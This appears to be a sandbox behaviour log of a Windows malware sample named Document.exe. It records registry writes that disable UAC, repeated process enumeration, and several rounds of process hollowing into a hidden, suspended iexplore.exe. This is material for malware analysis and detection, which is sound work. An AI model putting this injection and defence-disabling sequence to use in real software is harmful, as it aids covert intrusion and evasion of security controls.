Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessDEPPolicy, address_out = 0x7624eb9a	1	Fn
Module	Load	module_name = Kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessDEPPolicy, address_out = 0x7624eb9a	1	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = CallWindowProcA, address_out = 0x7784792f	1	Fn
Module	Load	module_name = ntdll, base_address = 0x77e20000	1	Fn
Module	Load	module_name = ntdll, base_address = 0x77e20000	1	Fn
Module	Load	module_name = ntdll, base_address = 0x77e20000	1	Fn
Module	Load	module_name = ntdll, base_address = 0x77e20000	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center, value_name = UACDisableNotify, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, value_name = EnableLUA, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Mutex	Open	mutex_name = I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441, desired_access = SYNCHRONIZE	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 512	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Environment	Get Environment String	name = PROGRAMFILES, result_out = C:\Program Files (x86)	1	Fn
Module	Load	module_name = ntdll, base_address = 0x77e20000	1	Fn
Module	Load	module_name = PSAPI.DLL, base_address = 0x75f90000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75f91544	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76231986	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76231410	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Module	Load	module_name = PSAPI.DLL, base_address = 0x75f90000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75f91408	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Module	Load	module_name = PSAPI.DLL, base_address = 0x75f90000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameA, address_out = 0x75f915a4	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Create	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, os_pid = 0xabc, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Module	Unmap	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe	1	Fn
Memory	Allocate	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x4070c0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1636580	1	Fn
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x400000, size = 4096	1	Fn
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x401000, size = 249856	1	Fn
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x43e000, size = 0	1	Fn
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x442000, size = 4096	1	Fn Data
Thread	Get Context	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x94c	1	Fn
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x7efde008, size = 4	1	Fn Data
Thread	Set Context	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x94c	1	Fn
Thread	Resume	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x94c	1	Fn
System	Get Time	type = Ticks, time = 223799	2	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 223845	4	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 223892	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 223939	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 223986	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224033	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224079	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224126	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224173	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224220	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224267	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224313	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224360	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224407	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224454	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224501	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224547	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224610	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224672	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224750	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224797	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224844	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224891	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224937	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 224984	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225047	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225093	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225140	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225187	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225234	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225281	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225296	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225343	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225390	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225437	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225483	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225530	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225561	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225608	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225655	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225702	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225749	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 225842	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226123	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226263	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226310	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226357	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226404	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226451	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226497	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226544	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226591	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226638	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226685	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226731	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226778	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226825	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 226872	1	Fn
Mutex	Open	mutex_name = I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441, desired_access = SYNCHRONIZE	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Create	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, os_pid = 0x35c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Module	Unmap	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe	1	Fn
Memory	Allocate	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x4070c0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1636580	1	Fn
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x400000, size = 4096	1	Fn Data
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x401000, size = 249856	1	Fn Data
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x43e000, size = 0	1	Fn
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x442000, size = 4096	1	Fn Data
Thread	Get Context	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x94c	1	Fn
Memory	Write	process_name = C:\Program Files (x86)\Internet Explorer\iexplore.exe, address = 0x7efde008, size = 4	1	Fn Data
Thread	Set Context	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x94c	1	Fn
Thread	Resume	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x94c	1	Fn
System	Get Time	type = Ticks, time = 227527	2	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 227605	4	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 227745	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 227808	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 227870	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 227933	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 227979	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228026	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228073	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228120	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228213	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228291	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228354	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228401	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228447	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228494	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228541	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228588	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228635	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228697	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 228993	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229040	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229103	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229149	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229196	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229259	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229305	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229352	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229399	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229446	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229493	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229539	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229602	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229649	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229695	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229742	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229805	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229851	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229898	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 229945	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230007	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230054	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230101	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230148	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230195	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230273	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230319	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230366	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230413	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230460	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230507	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230585	3	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 230647	1	Fn
Mutex	Open	mutex_name = I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441, desired_access = SYNCHRONIZE	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
